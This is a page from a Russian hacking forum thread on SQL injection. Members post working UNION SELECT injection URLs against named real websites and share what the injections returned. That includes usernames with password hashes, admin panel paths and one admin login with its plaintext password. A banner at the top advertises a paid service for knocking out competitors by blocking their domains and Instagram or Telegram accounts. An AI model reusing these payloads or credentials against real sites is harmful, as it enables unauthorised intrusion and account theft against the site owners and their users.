Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 170 из 1242

170

Опции темы

Поиск в этой теме

Опции просмотра

#1691

07.04.2007, 00:29

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://www.optimed.ru/index.php?area=prod&part=-1+union+select+1,2,version(),4,5,6,7,8/*

Код:

http://www.optimed.ru/admin/

мб админская таблица и есть, но я ее не нашел)

#1692

07.04.2007, 00:34

alextoun

Постоянный

Регистрация: 07.05.2006

Сообщений: 732

Провел на форуме:
7910701

Репутация: 811

Отправить сообщение для alextoun с помощью ICQ

Цитата:

http://www.optimed.ru/index.php?area=prod&part=-1+union+select+1,user(),version(),database(),5,6,7 ,8/*

ух ты валуехост

позже: хз не нашёл больше, спать надо

Последний раз редактировалось alextoun; 07.04.2007 в 00:41..

#1693

07.04.2007, 00:54

alextoun

Постоянный

Регистрация: 07.05.2006

Сообщений: 732

Провел на форуме:
7910701

Репутация: 811

Цитата:

http://www.maska-mix.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/

не подобрал

уже голова не варит

Академия онанизма и мастурбации

#1694

07.04.2007, 00:54

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

Провел на форуме:
5352530

Репутация: 2062

Академия онанизма и мастурбации

Код:

http://onanistov.net/kb.php?mode=cat&cat=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),user_password),0),0),3,4,5,66,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users+limit+1,1/*

Thoral:cd0d2dcda0f8df2960f53e8dd699fdab

Kamaz привет

#1695

07.04.2007, 02:26

Thanat0z

Постоянный

Регистрация: 06.12.2006

Сообщений: 762

Провел на форуме:
5352530

Репутация: 2062

Цитата:

http://www.fighterfitnessforum.com/kb.php?mode=cat&cat=2%20union%20select%201,AES_DEC RYPT(AES_ENCRYPT(concat(username,char(58),user_pas sword),0),0),3,4,5,6%20from%20phpbb_users+limit+2, 1/*
Björn:e786b2a1c90f80c0e7a674464f995b1a:grappling

Цитата:

http://www.worldwidedvdforums.com/kb.php?mode=cat&cat=-71%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(co ncat(username,char(58),user_password),0),0),3,4,5, 6%20from%20phpbb_users%20limit%201,2/*

Камаз

#1696

07.04.2007, 09:10

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

Провел на форуме:
1654589

Репутация: 337

Вывод в тайтле. 5 версия, но все прямые запросы с "from" блочит. Гифровать не пробовал(

Цитата:

http://www.dosgames.ru/index.php?action=game&act=sub&id=3300+union+select +1,version(),3,4,5,6,7,8,9,10,11,12,13/*

Пасы не нашел

Цитата:

http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,name,9,10,11,12,13,14,15,16,17,18,19,20+from+me mbers+limit+1,1/*

Последний раз редактировалось Fr-Ron; 07.04.2007 в 09:35..

#1697

07.04.2007, 10:31

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

походу пассы в 'pass', в остальных случаях выдает ошибку..

Код:

http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20+from+members+limit+5,1/*

либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..

Последний раз редактировалось n1†R0x; 07.04.2007 в 10:35..

#1698

07.04.2007, 12:07

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+25,1/*
http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6+from+admin/*

www.christymoore.com/admin
name: christymoore
pass:cmbb

Код:

http://www.cttc.ie/memberdetails.php?id=-27+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(email,0x71),0x71),4,5,6,7,8,9,10+from+members/*

таблицы не нашел=\

#1699

07.04.2007, 13:10

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

таблица юзер

Код:

http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,name,username,passwd,email)+from+user/*

шоп
имя:логин:хеш:мыло
таблица админ

Код:

http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,password)+from+admin/*

пароли все в mysql4
пока не расшифровал =\

#1700

07.04.2007, 13:42

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Отправить сообщение для V.I.P с помощью ICQ

PHP код:


		
			
Первый скуль.    http://projectors.toshiba.com.ru/news/list/show/?newsid=-27+union+select+1,2,database(),4,concat(user(),0x3a,version()),6,7,8,9,10,11,12,   14/*

Страница 170 из 1242

170

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход